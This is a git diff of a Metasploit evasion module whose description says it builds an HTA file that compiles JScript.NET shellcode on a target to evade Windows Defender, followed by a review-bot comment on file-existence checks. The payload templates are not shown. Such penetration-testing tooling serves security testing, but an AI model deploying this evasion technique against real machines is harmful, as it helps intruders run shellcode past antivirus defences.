Rename file
parent
c7efd57144
commit
a25a7086b2
|
@ -7,7 +7,7 @@ class MetasploitModule < Msf::Evasion
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(merge_info(info,
|
super(merge_info(info,
|
||||||
'Name' => 'Microsoft Windows Defender Evasive HTA',
|
'Name' => 'Microsoft Windows Defender Evasive JS.Net and HTA',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module will generate an HTA file that writes and compiles a JScript.NET file
|
This module will generate an HTA file that writes and compiles a JScript.NET file
|
||||||
containing shellcode on the target machine. After compilation, the generated EXE will
|
containing shellcode on the target machine. After compilation, the generated EXE will
|
||||||
|
@ -38,17 +38,16 @@ class MetasploitModule < Msf::Evasion
|
||||||
def run
|
def run
|
||||||
# This is used in the ERB template
|
# This is used in the ERB template
|
||||||
file_payload = Rex::Text.encode_base64(payload.encoded)
|
file_payload = Rex::Text.encode_base64(payload.encoded)
|
||||||
|
evasion_shellcode_path = File.join(Msf::Config.data_directory, 'exploits', 'evasion_shellcode.js')
|
||||||
jsnet_code = File.read(File.join(Msf::Config.data_directory, 'exploits', 'evasion_shellcode.js'))
|
jsnet_code = File.read(evasion_shellcode_path)
|
||||||
fail_with(Failure::NotFound, 'The JScript.NET file was not found.') unless File.exists?(jsnet_code)
|
fail_with(Failure::NotFound, 'The JScript.NET file was not found.') unless File.exists?(evasion_shellcode_path)
|
||||||
js_file = ERB.new(jsnet_code).result(binding())
|
js_file = ERB.new(jsnet_code).result(binding())
|
||||||
jsnet_encoded = Rex::Text.encode_base64(js_file)
|
jsnet_encoded = Rex::Text.encode_base64(js_file)
|
||||||
|
|
||||||
# This is used in the ERB template
|
# This is used in the ERB template
|
||||||
fname = Rex::Text.rand_text_alpha(6)
|
fname = Rex::Text.rand_text_alpha(6)
|
||||||
|
hta_path = File.join(Msf::Config.data_directory, 'exploits', 'hta_evasion.hta')
|
||||||
hta = File.read(File.join(Msf::Config.data_directory, 'exploits', 'hta_evasion.hta'))
|
hta = File.read(hta_path)
|
||||||
fail_with(Failure::NotFound, 'The HTA file was not found.') unless File.exists?(hta)
|
fail_with(Failure::NotFound, 'The HTA file was not found.') unless File.exists?(hta_path)
|
||||||
hta_file = ERB.new(hta).result(binding())
|
hta_file = ERB.new(hta).result(binding())
|
||||||
|
|
||||||
file_create(hta_file)
|
file_create(hta_file)
|
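Review bot: In `run`, `File.read(evasion_shellcode_path)` still executes before the `File.exists?(evasion_shellcode_path)` guard, so a missing template raises `Errno::ENOENT` from the read and the `fail_with(Failure::NotFound, ...)` line is never reached; the same ordering applies to `hta_path`. Each guard should come before its read, for example `fail_with(Failure::NotFound, 'The HTA file was not found.') unless File.exist?(hta_path)` followed by `hta = File.read(hta_path)`. `File.exists?` is deprecated and was removed in Ruby 3.2, so `File.exist?` is the safer spelling for both checks. The closing `end` of `run` is not visible on this page, so anything after `file_create(hta_file)` is outside this review.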